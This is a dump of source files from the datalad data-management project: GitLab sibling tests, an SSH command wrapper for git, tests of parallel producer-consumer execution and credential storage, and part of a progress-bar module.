existing='error' should yiel error\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _ExistingProjectGitLab):\n res = ds.create_sibling_gitlab(path=ds.path, site='dummy',\n project='here', existing='skip')\n assert_result_count(res, 1)\n assert_result_count(\n res, 0, action='create_sibling_gitlab',\n message=['already has a configured sibling \"%s\"', \"dummy\"],\n path=path,\n refds=path,\n site='dummy', sibling='dummy',\n status='error',\n type='dataset'\n )\n # try recreation, the sibling is already configured, same setup, no error\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\",\n _ExistingProjectGitLab):\n res = ds.create_sibling_gitlab(path=ds.path, site='dummy',\n project='here', existing='reconfigure')\n assert_result_count(\n res, 1, action='configure-sibling', path=path, name='dummy',\n url='http://example.com', status='ok')\n # but error when the name differs\n res = ds.create_sibling_gitlab(\n site='dummy', project='here', name='othername', on_failure='ignore')\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, action='create_sibling_gitlab', path=path,\n site='dummy', sibling='othername', project='here/project',\n project_attributes={\n 'http_url_to_repo': 'http://example.com',\n 'ssh_url_to_repo': 'example.com'\n },\n status='error')\n\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _CreateFailureGitLab):\n assert_status(\n 'error',\n ds.create_sibling_gitlab(site='dummy', project='here', on_failure='ignore')\n )\n\n # new sibling, ssh access\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _NewProjectGitLab):\n res = ds.create_sibling_gitlab(site='sshsite', project='here', access='ssh')\n assert_result_count(res, 2)\n assert_result_count(\n res, 1, action='create_sibling_gitlab', path=path, type='dataset',\n site='sshsite', sibling='sshsite', project='here/project',\n project_attributes={\n 'http_url_to_repo': 'http://example.com',\n 'ssh_url_to_repo': 'example.com',\n 'description': None\n },\n status='ok')\n assert_result_count(\n res, 1, action='configure-sibling', path=path, name='sshsite',\n url='example.com', status='ok')\n\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\",\n _ExistingProjectOtherURLGitLab):\n res = ds.create_sibling_gitlab(site='sshsite', project='here',\n access='ssh', on_failure='ignore',\n name='sshsite2')\n assert_result_count(res, 1)\n assert_result_count(\n res, 0, action='create_sibling_gitlab',\n message=[\"There is already a project at '%s' on site '%s', \"\n \"but no sibling with name '%s' is configured, \"\n \"maybe use --existing=reconfigure\", \"here\", \"sshsite\",\n \"sshsite2\"],\n path=path,\n refds=path,\n site='sshsite', sibling='sshsite2', project='here/project',\n project_attributes={\n 'http_url_to_repo': 'http://example2.com',\n 'ssh_url_to_repo': 'example2.com'\n },\n status='error',\n type='dataset')\n # same goes for switching the access type without --reconfigure\n assert_status(\n 'error',\n ds.create_sibling_gitlab(site='sshsite', project='here',\n access='http', on_failure='ignore')\n )\n" }, { "alpha_fraction": 0.5369579792022705, "alphanum_fraction": 0.5466187596321106, "avg_line_length": 33.7734375, "blob_id": "78aaafaf63e146d3c6963a49f219b97a783c9599", "content_id": "c2685d5d7530b711362d4715d32e6fe4b58bbf7b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4451, "license_type": "permissive", "max_line_length": 87, "num_lines": 128, "path": "/datalad/support/sshrun.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"SSH command to expose datalad's connection management to 3rd-party tools\n\nPrimary use case is to be used with git as core.sshCommand\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os\nimport sys\nimport tempfile\n\nfrom datalad.support.param import Parameter\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import build_doc\nfrom datalad.utils import split_cmdline\n\nfrom datalad import ssh_manager\n\nlgr = logging.getLogger('datalad.sshrun')\n\n\n@build_doc\nclass SSHRun(Interface):\n \"\"\"Run command on remote machines via SSH.\n\n This is a replacement for a small part of the functionality of SSH.\n In addition to SSH alone, this command can make use of datalad's SSH\n connection management. Its primary use case is to be used with Git\n as 'core.sshCommand' or via \"GIT_SSH_COMMAND\".\n\n Configure `datalad.ssh.identityfile` to pass a file to the ssh's -i option.\n \"\"\"\n\n _params_ = dict(\n login=Parameter(\n args=(\"login\",),\n doc=\"[user@]hostname\"),\n cmd=Parameter(\n args=(\"cmd\",),\n doc=\"command for remote execution\"),\n port=Parameter(\n args=(\"-p\", '--port'),\n doc=\"port to connect to on the remote host\"),\n ipv4=Parameter(\n args=(\"-4\",),\n dest=\"ipv4\",\n doc=\"use IPv4 addresses only\",\n action=\"store_true\"),\n ipv6=Parameter(\n args=(\"-6\",),\n dest=\"ipv6\",\n doc=\"use IPv6 addresses only\",\n action=\"store_true\"),\n options=Parameter(\n args=(\"-o\",),\n metavar=\"OPTION\",\n dest=\"options\",\n doc=\"configuration option passed to SSH\",\n action=\"append\"),\n no_stdin=Parameter(\n args=(\"-n\",),\n action=\"store_true\",\n dest=\"no_stdin\",\n doc=\"Do not connect stdin to the process\"),\n )\n\n @staticmethod\n def __call__(login, cmd,\n *,\n port=None, ipv4=False, ipv6=False, options=None,\n no_stdin=False):\n lgr.debug(\"sshrun invoked: login=%r, cmd=%r, port=%r, options=%r, \"\n \"ipv4=%r, ipv6=%r, no_stdin=%r\",\n login, cmd, port, options, ipv4, ipv6, no_stdin)\n # Perspective workarounds for git-annex invocation, see\n # https://github.com/datalad/datalad/issues/1456#issuecomment-292641319\n\n if cmd.startswith(\"'\") and cmd.endswith(\"'\"):\n lgr.debug(\n \"Detected additional level of quotations in %r so performing \"\n \"command line splitting\", cmd\n )\n # there is an additional layer of quotes\n # Let's strip them off by splitting the command\n cmd_ = split_cmdline(cmd)\n if len(cmd_) != 1:\n raise RuntimeError(\n \"Obtained more or less than a single argument after \"\n \"command line splitting: %s\" % repr(cmd_))\n cmd = cmd_[0]\n sshurl = 'ssh://{}{}'.format(\n login,\n ':{}'.format(port) if port else '')\n\n if ipv4 and ipv6:\n raise ValueError(\"Cannot force both IPv4 and IPv6\")\n elif ipv4:\n force_ip = 4\n elif ipv6:\n force_ip = 6\n else:\n force_ip = None\n\n ssh = ssh_manager.get_connection(sshurl, force_ip=force_ip)\n # use an empty temp file as stdin if none shall be connected\n stdin_ = tempfile.TemporaryFile() if no_stdin else sys.stdin\n try:\n # We pipe the SSH process' stdout/stderr by means of\n # `log_output=False`. That's necessary to let callers - for example\n # git-clone - communicate with the SSH process. Hence, we expect no\n # output being returned from this call:\n out, err = ssh(cmd, stdin=stdin_, log_output=False, options=options)\n assert not out\n assert not err\n finally:\n if no_stdin:\n stdin_.close()\n" }, { "alpha_fraction": 0.6243489980697632, "alphanum_fraction": 0.6387774348258972, "avg_line_length": 35.949527740478516, "blob_id": "2f51759b1a781bd0525e44f96f49707fada54879", "content_id": "485ded485b420261789305e138aeb374d5131232", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11713, "license_type": "permissive", "max_line_length": 103, "num_lines": 317, "path": "/datalad/support/tests/test_parallel.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nfrom functools import partial\nfrom time import (\n sleep,\n time,\n)\n\nimport pytest\n\n# logging effects threading and causes some 'weak' tests to fail,\n# so we will just skip those (well, if happens again -- disable altogether)\nfrom datalad import lgr\nfrom datalad.support import path as op\nfrom datalad.support.exceptions import IncompleteResultsError\n# absolute import only to be able to run test without `nose` so to see progress bar\nfrom datalad.support.parallel import (\n ProducerConsumer,\n ProducerConsumerProgressLog,\n no_parentds_in_futures,\n)\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_greater,\n assert_greater_equal,\n assert_raises,\n assert_repo_status,\n known_failure_osx,\n on_osx,\n on_windows,\n rmtree,\n skip_if,\n slow,\n with_tempfile,\n)\n\ninfo_log_level = lgr.getEffectiveLevel() >= logging.INFO\n\n\ndef check_ProducerConsumer(PC, jobs):\n def slowprod(n, secs=0.001):\n for i in range(n):\n yield i\n sleep(secs)\n\n def slowcons(i):\n # so takes longer to consume than to produce and progress bar will appear\n # after slowprod is done producing\n sleep(0.002)\n yield from fastcons(i)\n\n def fastcons(i):\n # we should still work correctly if consumer is fast!\n yield {\n \"i\": i, \"status\": \"ok\" if i % 2 else \"error\"\n }\n\n for cons in fastcons, slowcons:\n # sorted since order of completion is not guaranteed\n assert_equal(\n sorted(PC(\n slowprod(10),\n cons,\n jobs=jobs),\n key=lambda r: r['i']),\n [{\"i\": i, \"status\": \"ok\" if i % 2 else \"error\"} for i in range(10)])\n\n\ndef check_producing_consumer(jobs):\n def producer():\n yield from range(3)\n def consumer(i):\n yield i\n if isinstance(i, int):\n pc.add_to_producer_queue(str(i**2))\n\n # we auto-detect generator function producer\n pc = ProducerConsumer(producer, consumer, jobs=jobs)\n assert_equal(list(pc), [0, 1, 2, \"0\", \"1\", \"4\"])\n\n\ndef check_producer_future_key(jobs):\n def producer():\n for i in range(3):\n yield i, {\"k\": i**2} # dict is mutable, will need a key\n\n def consumer(args):\n i, d = args\n yield i\n\n pc = ProducerConsumer(producer(), consumer, producer_future_key=lambda r: r[0], jobs=jobs)\n assert_equal(list(pc), [0, 1, 2])\n\n\ndef test_ProducerConsumer():\n # Largely a smoke test, which only verifies correct results output\n for jobs in \"auto\", None, 1, 10:\n for PC in ProducerConsumer, ProducerConsumerProgressLog:\n check_ProducerConsumer(PC, jobs)\n check_producing_consumer(jobs)\n check_producer_future_key(jobs)\n\n\n@slow # 12sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_creatsubdatasets(topds_path=None, n=2):\n from datalad.api import create\n from datalad.distribution.dataset import Dataset\n ds = Dataset(topds_path).create()\n paths = [op.join(topds_path, \"subds%d\" % i) for i in range(n)]\n paths.extend(op.join(topds_path, \"subds%d\" % i, \"subsub%d\" %k) for i in range(n) for k in range(2))\n # To allow for parallel execution without hitting the problem of\n # a lock in the super dataset, we create all subdatasets, and then\n # save them all within their superdataset\n create_ = partial(create, # cfg_proc=\"yoda\",\n result_xfm=None, return_type='generator')\n # if we flip the paths so to go from the end, create without --force should fail\n # and we should get the exception (the first one encountered!)\n # Note: reraise_immediately is of \"concern\" only for producer. since we typically\n # rely on outside code to do the killing!\n assert_raises(IncompleteResultsError, list, ProducerConsumer(paths[::-1], create_, jobs=5))\n # we are in a dirty state, let's just remove all those for a clean run\n rmtree(topds_path)\n\n # and this one followed by save should be good IFF we provide our dependency checker\n ds = Dataset(topds_path).create()\n list(ProducerConsumer(paths, create_, safe_to_consume=no_parentds_in_futures, jobs=5))\n ds.save(paths)\n assert_repo_status(ds.repo)\n\n\ndef test_gracefull_death():\n\n def assert_provides_and_raises(pc, exception, target=None):\n \"\"\"Helper to get all results before exception is raised\"\"\"\n results = []\n with assert_raises(exception):\n for r in pc:\n results.append(r)\n # results should be sorted since we do not guarantee order\n results = sorted(results)\n if target is not None:\n assert_equal(results, target)\n return results\n\n def interrupted_producer():\n yield 1\n raise ValueError()\n\n def consumer(i):\n sleep(0.001)\n yield i\n\n assert_provides_and_raises(\n ProducerConsumer(interrupted_producer(), consumer, jobs=3), ValueError, [1])\n\n def faulty_consumer(i):\n sleep(0.001)\n if i == 1:\n raise ValueError()\n return i\n\n # so we do not get failed, but other parallel ones finish their job\n results = assert_provides_and_raises(\n ProducerConsumer(range(1000), faulty_consumer, jobs=5), ValueError)\n # and analysis of futures to raise an exception can take some time etc, so\n # we could get more, but for sure we should not get all 999 and not even a 100\n if info_log_level:\n assert_greater(100, len(results))\n assert_equal(results[:4], [0, 2, 3, 4])\n\n def producer():\n for i in range(10):\n sleep(0.0003)\n yield i\n raise ValueError()\n # by default we do not stop upon producer failing\n assert_provides_and_raises(\n ProducerConsumer(producer(), consumer, jobs=2), ValueError, list(range(10)))\n # if producer produces more than we can as quickly consume but then fails\n # ATM we do not proceed to consume other items, but fail when we finish\n # consuming until the time point when producer has failed\n # by default we do not stop upon producer failing\n results = assert_provides_and_raises(\n ProducerConsumer(producer(), consumer, reraise_immediately=True, jobs=2),\n ValueError)\n # we will get some results, seems around 4 and they should be \"sequential\"\n assert_equal(results, list(range(len(results))))\n try:\n assert_greater_equal(len(results), 2)\n except AssertionError:\n # Possible TODO: if tests below would start failing too, move xfail to the level\n # of the entire test\n pytest.xfail(f\"Rarely but happens. Got only {len(results)} instead of at least 2\")\n\n # This test relies too much on threads scheduling to not hog up on handling\n # consumers, but if it happens so - they might actually consume all results\n # before producer decides to finally raise an exception. As such it remains\n # flaky and thus not ran, but could be useful to test locally while\n # changing that logic.\n #\n # if info_log_level and not (on_windows or on_osx):\n # # consumers should not be able to consume all produced items.\n # # production of 10 should take 3 unites, while consumers 10/2 (jobs)\n # # 5 units, so some should not have a chance.\n # assert_greater_equal(8, len(results))\n\n # Simulate situation close to what we have when outside code consumes\n # some yielded results and then \"looses interest\" (on_failure=\"error\").\n # In this case we should still exit gracefully (no GeneratorExit warnings),\n # not over-produce, and also do not kill already running consumers\n consumed = []\n def inner():\n def consumer(i):\n sleep(0.01)\n consumed.append(i)\n return i\n pc = iter(ProducerConsumer(range(1000), consumer, jobs=2))\n yield next(pc)\n yield next(pc)\n # typically it should be [0, 1] but it does happen some times that\n # one other worker gets ahead and we get [0, 2]. As it is not per se the\n # purpose of this test to ensure absence of such race, we just allow for any\n # two from first 3 possible.\n assert len(set(inner()).intersection({0, 1, 2})) == 2\n consumed = sorted(consumed)\n assert_equal(consumed, list(range(len(consumed))))\n assert_greater_equal(len(consumed), 4) # we should wait for that 2nd batch to finish\n if info_log_level:\n assert_greater_equal(20, len(consumed))\n\n\n# `test_stalling` is a speculative test that is intended to detect stalled\n# subprocess execution by assuming an upper limit for the execution time of the\n# subprocess. Due to the nature of non-realtime process scheduling, this\n# assumption is necessarily incorrect and might be validated in a perfectly\n# working system. In other words, the test has the potential to create false\n# positives.\n# By raising the assumed maximum execution time, we try to reduce the number of\n# false positives.\n#\n# The test exists because an earlier version of `WitlessRunner` was based on\n# event loops and there was at least one stalling condition that manifested\n# itself in python 3.7 (see:\n# https://github.com/datalad/datalad/pull/5022#issuecomment-708716290). As of\n# datalad version 0.16, event loops are no longer used in `WitlessRunner` and\n# this test is a shot in the dark.\ndef test_stalling(kill=False):\n import concurrent.futures\n\n from datalad.runner.coreprotocols import StdOutErrCapture\n from datalad.runner.runner import WitlessRunner\n\n def worker():\n return WitlessRunner().run([\"echo\", \"1\"], StdOutErrCapture)\n\n t0 = time()\n result1 = worker()\n dt1 = time() - t0\n\n t0 = time()\n with concurrent.futures.ThreadPoolExecutor(1) as executor:\n future = executor.submit(worker)\n dt2_limit = max((5, dt1 * 100))\n while not future.done():\n sleep(dt1/3)\n if time() - t0 > dt2_limit:\n # does not even shutdown\n # executor.shutdown(wait=False)\n if kill:\n # raising an exception isn't enough!\n print(\"exceeded\")\n import os\n import signal\n os.kill(os.getpid(), signal.SIGTERM)\n raise AssertionError(f\"Future has not finished in {dt2_limit}s\")\n result2 = future.result()\n assert result1 == result2\n\n\n@with_tempfile(mkdir=True)\ndef test_parallel_flyweights(topd=None):\n from datalad.support.gitrepo import GitRepo\n\n # ProducerConsumer relies on unique args to consumer so we will provide 2nd different arg\n def create_GitRepo(args):\n return GitRepo(args[0])\n\n # let's really hunt down race condition\n for batch in range(10):\n repopath = op.join(topd, str(batch))\n # should succeed and be the same thing\n # An example of errored run: https://github.com/datalad/datalad/issues/6598\n repos = list(\n ProducerConsumer(\n ((repopath, i) for i in range(10)),\n create_GitRepo,\n jobs=10\n )\n )\n assert op.exists(repopath)\n instances = set(map(id, repos))\n assert len(instances) == 1\n\n\nif __name__ == '__main__':\n test_ProducerConsumer()\n # test_creatsubdatasets()\n # test_stalling(kill=True)\n" }, { "alpha_fraction": 0.616432249546051, "alphanum_fraction": 0.6234644651412964, "avg_line_length": 35.355987548828125, "blob_id": "554aa8702d434e4aafbbfea2a1cc0f40fa8563fa", "content_id": "24c519b5b91d18862a92c278df72c3c82539ace8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11234, "license_type": "permissive", "max_line_length": 97, "num_lines": 309, "path": "/datalad/downloaders/tests/test_credentials.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for credentials\"\"\"\n\nfrom unittest.mock import patch\n\nfrom datalad import cfg as dlcfg\nfrom datalad.api import Dataset\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.keyring_ import (\n Keyring,\n MemoryKeyring,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_false,\n assert_in,\n assert_raises,\n assert_true,\n ok_file_has_content,\n skip_if,\n with_tempfile,\n with_testsui,\n)\n\nfrom ..credentials import (\n AWS_S3,\n CompositeCredential,\n GitCredential,\n UserPassword,\n)\n\n\n@with_testsui(responses=[\n 'user1', 'password1',\n # when we do provide user to enter_new\n 'newpassword',\n])\ndef test_cred1_enter_new():\n keyring = MemoryKeyring()\n cred = UserPassword(\"name\", keyring=keyring)\n assert_false(cred.is_known)\n assert_equal(cred.enter_new(), None)\n assert_true(cred.is_known)\n assert_equal(keyring.get('name', 'user'), 'user1')\n assert_equal(keyring.get('name', 'password'), 'password1')\n keyring.delete('name')\n assert_raises(KeyError, keyring.delete, 'name', 'user')\n assert_raises(KeyError, keyring.delete, 'name')\n assert_equal(keyring.get('name', 'user'), None)\n\n # Test it blowing up if we provide unknown field\n with assert_raises(ValueError) as cme:\n cred.enter_new(username='user')\n assert_in('field(s): username. Known but not specified: password, user',\n str(cme.value))\n\n # Test that if user is provided, it is not asked\n cred.enter_new(user='user2')\n assert_equal(keyring.get('name', 'user'), 'user2')\n assert_equal(keyring.get('name', 'password'), 'newpassword')\n\n\n@with_testsui(responses=['password1', 'newuser', 'newpassword'])\ndef test_cred1_call():\n keyring = MemoryKeyring()\n cred = UserPassword(\"name\", keyring=keyring)\n # we will set the name but not the password, expecting UI\n # requesting it\n assert_equal(keyring.set('name', 'user', 'user1'), None)\n assert_equal(keyring.get('name', 'user'), 'user1')\n assert_equal(cred(), {'user': 'user1', 'password': 'password1'})\n assert_equal(keyring.get('name', 'password'), 'password1')\n # without intervention the same credentials will be reused\n # in subsequent attempts\n assert_equal(cred(), {'user': 'user1', 'password': 'password1'})\n with patch.dict(dlcfg._merged_store, {'datalad.credentials.force-ask': 'yes'}):\n assert_equal(cred(), {'user': 'newuser', 'password': 'newpassword'})\n assert_equal(keyring.get('name', 'user'), 'newuser')\n assert_equal(keyring.get('name', 'password'), 'newpassword')\n\n\ndef test_keyring():\n # mock out keyring methods and test that we are providing correct values\n # with 'datalad-' prefix\n raise SkipTest(\"provide tests for Keyring which interfaces keyring module\")\n\n\ndef _cred1_adapter(composite, user=None, password=None):\n \"\"\"Just a sample adapter from one user/pw type to another\"\"\"\n return dict(user=user + \"_1\", password=password + \"_2\")\n\n\nclass _CCred1(CompositeCredential):\n \"\"\"A Simple composite credential which will do some entries transformation\n \"\"\"\n _CREDENTIAL_CLASSES = (UserPassword, UserPassword)\n _CREDENTIAL_ADAPTERS = (_cred1_adapter,)\n\n\n@with_testsui(responses=['user1', 'password1',\n 'user2', 'password2'])\ndef test_composite_credential1():\n # basic test of composite credential\n keyring = MemoryKeyring()\n cred = _CCred1(\"name\", keyring=keyring)\n # When queried, does the chain\n assert_equal(cred(), {'user': 'user1_1', 'password': 'password1_2'})\n # But the \"Front\" credential is exposed to the user\n assert_equal(cred.get('user'), 'user1')\n assert_equal(keyring.get('name', 'user'), 'user1')\n assert_raises(ValueError, cred.get, 'unknown_field')\n assert_equal(cred.get('password'), 'password1')\n assert_equal(keyring.get('name', 'password'), 'password1')\n # ATM composite credential stores \"derived\" ones unconditionally in the\n # keyring as well\n assert_equal(keyring.get('name:1', 'user'), 'user1_1')\n assert_equal(keyring.get('name:1', 'password'), 'password1_2')\n\n # and now enter new should remove \"derived\" entries\n cred.enter_new()\n assert_equal(keyring.get('name', 'user'), 'user2')\n assert_equal(keyring.get('name', 'password'), 'password2')\n # we immediately refresh all credentials in the chain\n assert_equal(keyring.get('name:1', 'user'), 'user2_1')\n assert_equal(keyring.get('name:1', 'password'), 'password2_2')\n assert_equal(cred(), {'user': 'user2_1', 'password': 'password2_2'})\n\n\ndef test_credentials_from_env():\n keyring = Keyring()\n cred = AWS_S3(\"test-s3\", keyring=keyring)\n assert_false(cred.is_known)\n assert_equal(cred.get('key_id'), None)\n assert_equal(cred.get('secret_id'), None)\n\n def _check1():\n assert_equal(cred.get('key_id'), '1')\n assert_false(cred.is_known)\n\n def _check2():\n assert_equal(cred.get('key_id'), '1')\n assert_equal(cred.get('secret_id'), '2')\n assert_true(cred.is_known)\n\n # this is the old way, should still work\n with patch.dict('os.environ', {'DATALAD_test_s3_key_id': '1'}):\n _check1()\n with patch.dict('os.environ', {'DATALAD_test_s3_secret_id': '2'}):\n _check2()\n assert_false(cred.is_known) # no memory of the past\n\n # here is the new way\n import datalad\n try:\n with patch.dict('os.environ', {'DATALAD_CREDENTIAL_test__s3_key__id': '1'}):\n datalad.cfg.reload()\n _check1()\n with patch.dict('os.environ', {'DATALAD_CREDENTIAL_test__s3_secret__id': '2'}):\n datalad.cfg.reload()\n _check2()\n datalad.cfg.reload()\n assert_false(cred.is_known) # no memory of the past\n finally:\n datalad.cfg.reload()\n\n\n@skip_if(not external_versions['keyrings.alt'])\n@with_tempfile\ndef test_delete_not_crashing(path=None):\n # although in above test we just use/interact with Keyring without specifying\n # any custom one, there we do not change it so I guess it is ok. Here we want\n # a real keyring backend which we will alter\n from keyrings.alt.file import PlaintextKeyring\n kb = PlaintextKeyring()\n kb.filename = path\n\n keyring = Keyring(keyring_backend=kb)\n cred = UserPassword(\"test1\", keyring=keyring)\n\n cred.set(user=\"user1\", password=\"password\")\n ok_file_has_content(path, \".*test1.*\", re_=True) # keyring backend saves where we expect\n\n # manually delete one component of the credential\n cred._keyring.delete(cred.name, next(iter(cred._FIELDS)))\n\n # now delete entire credential -- we must not crash\n cred.delete()\n try:\n ok_file_has_content(path, \".*test1.*\", re_=True) # keyring backend saves where we expect\n raise AssertionError(\"keyring still has our key\")\n except AssertionError:\n pass\n\n\n@with_tempfile\ndef test_gitcredential_read(path=None):\n\n matching_url = \"https://example.datalad.org\"\n non_matching_url = \"http://some.other.org\"\n ds = Dataset(path).create()\n\n # Set configs so git-credential does provide something,\n # using an inline helper:\n\n # Simple inline credential helper to provide a password to read.\n # Strangely seems to pass on windows. Probably depends on what git is\n # passing this definition to (git-bash).\n cred_helper = \\\n \"!f() { test \\\"$1\\\" = get && echo \\\"password=apassword\\\"; }; f\"\n\n ds.config.add(f\"credential.{matching_url}.username\", \"auser\",\n scope=\"local\")\n ds.config.add(f\"credential.{matching_url}.helper\", cred_helper,\n scope=\"local\")\n\n # we can get those credentials when the context is right:\n cred = GitCredential(\"some\", auth_url=matching_url,\n dataset=ds)\n\n assert_true(cred.is_known)\n assert_equal(cred.get('user'), 'auser')\n assert_equal(cred.get('password'), 'apassword')\n\n # env var overrules\n import datalad\n try:\n with patch.dict('os.environ', {'DATALAD_CREDENTIAL_some_user': 'new'}):\n datalad.cfg.reload()\n assert_true(cred.is_known)\n assert_equal(cred.get('user'), 'new')\n assert_equal(cred.get('password'), 'apassword')\n with patch.dict('os.environ',\n {'DATALAD_CREDENTIAL_some_password': 'pwd'}):\n datalad.cfg.reload()\n assert_true(cred.is_known)\n assert_equal(cred.get('user'), 'new')\n assert_equal(cred.get('password'), 'pwd')\n finally:\n datalad.cfg.reload()\n\n # different context\n cred = GitCredential(\"some\", auth_url=non_matching_url,\n dataset=ds)\n # unknown since git-credential config doesn't match\n assert_false(cred.is_known)\n\n # however, w/ env vars still works:\n try:\n with patch.dict('os.environ',\n {'DATALAD_CREDENTIAL_some_user': 'user3'}):\n datalad.cfg.reload()\n assert_false(cred.is_known) # no pwd yet\n assert_equal(cred.get('user'), 'user3')\n assert_equal(cred.get('password'), None)\n with patch.dict('os.environ',\n {'DATALAD_CREDENTIAL_some_password': 'pass3'}):\n datalad.cfg.reload()\n assert_true(cred.is_known)\n assert_equal(cred.get('user'), 'user3')\n assert_equal(cred.get('password'), 'pass3')\n # without the env vars unknown yet again:\n assert_false(cred.is_known)\n finally:\n datalad.cfg.reload()\n\n\n@with_tempfile\ndef test_gitcredential(path=None):\n\n # Note, that credential labels are irrelevant in context of the to be tested\n # Object here.\n\n matching_url = \"https://example.datalad.org\"\n non_matching_url = \"http://some.other.org\"\n ds = Dataset(path).create()\n # use git native credential store\n ds.config.add(\"credential.helper\", \"store\", scope='local')\n\n # store credentials\n cred = GitCredential(\"cred_label\", auth_url=matching_url, dataset=ds)\n cred.set(user=\"dl-user\", password=\"dl-pwd\")\n\n # read it again\n cred2 = GitCredential(\"whatever\", auth_url=matching_url, dataset=ds)\n assert_equal(cred2.get(\"user\"), \"dl-user\")\n assert_equal(cred2.get(\"password\"), \"dl-pwd\")\n # but doesn't deliver w/o matching url\n cred3 = GitCredential(\"whatever\", auth_url=non_matching_url, dataset=ds)\n assert_equal(cred3.get(\"user\"), None)\n assert_equal(cred3.get(\"password\"), None)\n\n # delete it\n cred2.delete()\n\n # not there anymore\n cred4 = GitCredential(\"yet_another\", auth_url=matching_url, dataset=ds)\n assert_equal(cred4.get(\"user\"), None)\n assert_equal(cred4.get(\"password\"), None)\n\n # delete non-existing\n cred2.delete()\n" }, { "alpha_fraction": 0.5147058963775635, "alphanum_fraction": 0.5173723101615906, "avg_line_length": 32.630435943603516, "blob_id": "5d94f50b16804956c343425f66b55d15795a8c91", "content_id": "3d855e2f82cd453d6d998a2a1e2fdbeb8ba27fb0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12376, "license_type": "permissive", "max_line_length": 91, "num_lines": 368, "path": "/datalad/ui/progressbars.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Progress bar implementations to be used.\n\nShould not be imported until we know that interface needs it\n\"\"\"\n\nimport humanize\nimport sys\nimport time\n\nfrom .. import lgr\n\n#\n# Haven't found an ideal progress bar yet, so to make things modular etc\n# we will provide our interface and adapters for few popular ones\n#\n\n\nclass ProgressBarBase(object):\n \"\"\"Base class for any progress bar\"\"\"\n\n def __init__(self, label=None, fill_text=None, total=None, out=None, unit='B'):\n self.label = label\n self.fill_text = fill_text\n self.total = total\n self.unit = unit\n self.out = out\n self._current = 0\n\n def refresh(self):\n \"\"\"Force update\"\"\"\n pass\n\n def update(self, size, increment=False, total=None):\n if total:\n self.total = total\n if not size:\n return\n if increment:\n self._current += size\n else:\n self._current = size\n\n @property\n def current(self):\n return self._current\n\n @current.setter\n def current(self, value):\n assert value >= 0, \"Total cannot be negative\"\n self._current = value\n\n def start(self, initial=0):\n self._current = initial\n\n def finish(self, partial=False):\n \"\"\"\n\n Parameters\n ----------\n partial: bool\n To signal that finish is called possibly before the activity properly\n finished, so .total count might have not been reached\n\n Returns\n -------\n\n \"\"\"\n pass\n\n def clear(self):\n pass\n\n def set_desc(self, value):\n pass # to override in subclass on how to handle description\n\n\nclass SilentProgressBar(ProgressBarBase):\n def __init__(self, label='', fill_text=None, total=None, unit='B', out=sys.stdout):\n super(SilentProgressBar, self).__init__(total=total)\n\n\nclass LogProgressBar(ProgressBarBase):\n \"\"\"A progress bar which logs upon completion of the item\n\n Note that there is also :func:`~datalad.log.log_progress` which can be used\n to get progress bars when attached to a tty but incremental log messages\n otherwise (as opposed to just the final log message provided by\n `LogProgressBar`).\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(LogProgressBar, self).__init__(*args, **kwargs)\n # I think we never generate progress bars unless we are at the beginning\n # of reporting something lengthy. .start is not always invoked so\n # we cannot reliably set it there instead of the constructor (here)\n self._start_time = time.time()\n\n @staticmethod\n def _naturalfloat(x):\n \"\"\"Return string representation of a number for human consumption\n\n For abs(x) <= 1000 would use 'scientific' (%g) notation, and for the\n larger a regular int (after rounding)\n \"\"\"\n return ('%g' % x) if abs(x) <= 1000 else '%i' % int(round(x))\n\n def _naturalsize(self, x):\n if self.unit == 'B':\n return humanize.naturalsize(x)\n else:\n return 